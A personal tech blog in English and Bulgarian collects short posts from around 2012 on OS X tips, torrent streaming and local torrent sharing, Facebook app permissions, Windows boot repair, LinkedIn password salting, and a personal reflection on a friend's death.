icloud.com is very neat - Mail, Contacts, Calendar, Find My iPhone, iWork.

People say there are battery issues. I haven't tested.

 

OS X adding extra dictionaries

OS X has a three-finger feature that translates or explains (depending on the dictionary) any word in any text. It has english dictionary by default plus wikipedia.

Bulgarian dictionary:

  1.  http://mac.tashev.info/.

German-English:

  1. 20mb http://www.macupdate.com/app/mac/10376/english-german-dictionary. This is far too insufficient.
  2. dict.cc integrated 600mb http://lipflip.org/articles/dictcc-dictionary-plugin. This has a lot more words. Also "lookup online" feature that goes to dict.cc.

Dictionaries are installed either in /Library/Dictionaries or in /Users/<UserName>/Library/Dictionaries.

Facebook apps - no way out?!

At some point I saw many items in my facebook timeline coming from some weird apps. So I go to settings and see this:

I checked the list. I recognized only 5-10 apps. I don't how the others got access to my account. So I check online how to switch the whole thing off. I found the button in the privacy settings. It looks like this:

I click it, and then I get this:

I have been getting this for a couple of weeks now. Facebook dudes, I know that by using your service I give you full control over everything I do and get no control over what you do with my info, but at least make me feel like I have some control.

This is far too unprofessional.

Смъртта

Една приятелка почина преди няколко години. Преди няколко дни беше годишнина. Не знам дали иделизирам девойката или наистина беше страхотен ч0век - не мога да преценя сега. Но не беше лош човек определено. Тъжно е. Наскоро разбрах, че родителите й също са починали. А от двете ми срещи с тях ми се сториха много положителни хора. И доколкото успях да разбера, смъртта на единственото им дете сигурно е била тежка за приемане.

С Лора не винаги сме били на една вълна. Но никога не й се разсърдих сякаш и останахме приятели до края. Срещал съм адски гадни копелета през живота си и се чудя защо по дяволите точно нея прибра? Сякаш е честно някое гадно копеле да беше заело нейното място. Знам, че животът не е честен, но пък понякога човек не може да проумее тоталната безпричинност на всичко, което се случва...

Замислих се за родителите й. Възможно е смъртта на Лора да е била твърде тежка за приемане новина и това да е било нещото, което сякаш е изгасило светлината в края на тунела. Възможно ли е човек да загуби нещо, което да го накара да изгуби волята да се бори и да продължава напред? Аз напоследък минавам през разни неща и знам, че всичко ще се оправи, но има моменти...

Can I watch 1080p torrents while downloading on OS X? -- YES

Updated tutorial with better torrent client here.

Most large torrent files (8-20 gb) take quite a while to download. Is there software for Mac OS X that allows me to watch them while downloading?

The solution

I tried all (I mean all) torrent clients for OS X that I could find.

There were people before me who wanted the same feature and have asked the most popular clients (uTorrent and Transmission) whether they would support serial downloading. Developers replied that that would defeat the purpose of torrent protocol (it would seem that uTorrent changed their minds and have such a feature for windows).

Finally I found one that could download file parts in order. It's called BitThief. It's a research project and has an awful interface. But it works, and most importantly downloads serially.

->
-> -> ->

After the file is put for downloading, the speed must be good enough for watching. For example, if the movie is 1:30h long, I check the ETA time to be less than that.

To watch the movie I use MplayerX (an OS X GUI for mplayer). It can be downloaded for free from OS X App Store. Mplayer is light, can play EVERYTHING, and navigation is done with the arrow keys. Mplayer automatically regenerates the index (the thing that allows using the progress bar). The OS X gui is awesome and supports the Lion's full-screen view.



There's always a chance that things could go wrong - low speed or high speed in the beginning and then low speed (which is even worse).

Keep in mind that in order to watch a 1:30h long movie that is 20gbytes, you have to download with ~3.7mbytes/sec.

Update: tested with 700mb AVIs, 2gb, 6gb, 8gb, 20gb MKVs (was lazy to check the codec, h264 mostly I guess).

Update 2012.07.02: This solution has been serving me quite good. Still here are the issues: BitThief is not very optimized and while other torrent clients can utilize my whole bandwidth, BitThief fails from time to time, probably because it is downloading sequentially. Also magnet links are not supported and the interface sucks so much.

Update 2012.08.16: A fix for utilizing magnet links: magnet->torrent converter. Utilizing magnet links allows this process to work for thepiratebay.org and other sites utilizing the new magnet url technology.

Update 2013.02.04: The newest version of BitThief now supports Magnet URIs. They're saying that a new look and feel is also coming.

Хриси

Хриси има два партишъна: един logical, на който е инсталирана операционната система, след него има един primary партишън с данни.

MBR сочи към втория, затова там са ntldr, ntdetect.com и boot.ini, сега ще ги сложа тук. (hrisi_boot)

Вероятно й е свършило дисковото пространство и е замазала файловете и затова не е буутвало (NTLDR is missing грешка).

Сега системния драйв е почистен от инсталатори и има достатъчно празно пространство.

Ако сега нещо се скапе, отивам на ntldrismissing.com, правя си буутъбъл флашка и качвам новите файлове.

 

RAR files with cyrillic inside on OS X

Most rar extractors on OS X (B1FreeArchiver and SimplyRAR) cannot extract files with cyrillic in the name. The files have a weird name and the extensions get completely messed up:

Solution

Share a folder with a Windows XP VM, use WinRAR to extract directly in the shared folder (it is not a problem to use a shared folder directly). And voila the files have the correct names and extensions.

Stuff to do when reinstalling OS X Lion

  • Update, update, update
  • Set up iCloud.
  • Add Bulgarian Phonetic, change the Cmd+Space for langs, Alt+Cmd+Space for spotlight.
  • Add Bulgarian to Dict. There's a blog article for that.
  • Add Trackpad settings, switch off "Natural scrolling".
  • link the laptop with a cable to the TimeMachine.
  • Copy mihail.stoynov/
  • Set up wi-fi sync in iTunes for music and photos only.

 

Apps to install:

  • Chrome, log in with account.
  • iStat menus (paid)
  • uTorrent
  • iPhoto, GarageBand (from iLife) (paid).
  • Carbon Copy Cloner
  • CleanMyMac (paid)
  • Disk Inventory X
  • Dropbox
  • Filezilla
  • Firefox
  • gfxCardStatus
  • NO Ez7Z
  • Gruml
  • Mactrackr (appstore)
  • Maltego
  • MplayerX (appstore)
  • OmniDiskSweeper
  • Remote Desktop Connection 2.1 (requires admin rights to install?)
  • Skype
  • TeamViewer
  • Tomato Torrent
  • TorBrowser
  • Transmission
  • Transmit
  • Twitter (appstore)
  • VirtualBox (+extension pack)
  • VLC
  • VMWare Fusion
  • aMule
  • B1 Free Archiver for Mac
  • TunesText widget
  • GAget widget for mihail.stoynov.com graph

 

Cool new features in OS X Lion. The trackpad.

The coolest thing here is the dictionary - double-tap with three fingers. Adding extra dictionaries is not very straight-forward, but go to this guy: http://mac.tashev.info/:

You can link the dictionary with wikipedia (even the bg version of it). It is amazing.

Another very cool thing is the three finger drag.

Screen 2 - smart zoom, but it doesn't work everywhere.

When OS X Lion came out, the three-finger horizontal drag (swipe) was for switching between screens. In the previous versions it was four-finger. In the latest update they went back to four-fingers, since the three-finger swipe is for dragging windows.

I wouldn't trade a macbook just for the trackpad. I stopped using a mouse since my first one. I am so used to it that when I get back to a normal trackpad it looks like I'm back in the stone age.

Default contact group on iPhone

My iPhone downloads my contacts from gmail. Whenever I click on 'Add new contact' I want this new contact to be uploaded to gmail. Unfortunately that is not the default behaviour. The new contact goes to iCloud, even though my default mail and contacts account is gmail.

Here's how to fix this:

20120625-150844.jpg

Remove the iCloud contacts sync. This will completely remove the iCloud contacts group:

20120625-151005.jpg

Problem solved

LinkedIn has dicovered salting

You've heard of the recent LinkedIn leak of hashed passwords, right?

Well, this is what they say on their blog:

Finally, we’ve enhanced our security measures through an additional layer of technical protection know as “salting” to better secure your information.

LinkedIn, your passwords weren't salted, really?

And recently they sent me an email saying my hashed password is on a hacker forum.

Anonymous SMB sharing from OS X Lion (10.7)

Sharing a folder via SMB (the so called Windows Sharing) with OS X is easy. But username and password were always required. I wanted to make an anonymous share and didn't know how.

Sharing is done like this:

One can see the Everyone user added and still a password was required to log in. Accidentally I found the fix for that.

I had to enable the guest user for file sharing:

That's it. Problem solved.

NOTE: The guest user is disabled by default in OS X Lion. You'll have to enable it first.

Local torrent server on OS X

Today I had to share 13 GB with ~10 people, and I had to do it quickly. I thought of many options - ftp (it would take a while), usb flash drive - even worse.

I thought of the P2P capabilities of the torrent technology. How hard can it be?

Starting a local server couldn't have been easier. I used Tomato Torrent:

There aren't many options, the defaults are good enough. To share the torrents initially I used Transmission. uTorrent for some reason refused to share the files or it was too slow, I don't know.

Transmission:

The torrent server even has a very basic web interface that doesn't tell much, but it is helpful:

13 Gb transmitted to  ~10 people in a 100mbit LAN network in less than an hour. And my machine didn't take that much of a performance hit. I worked during that time.

NOTE: creating the torrents as private somehow made sharing faster. I don't know why. But it did.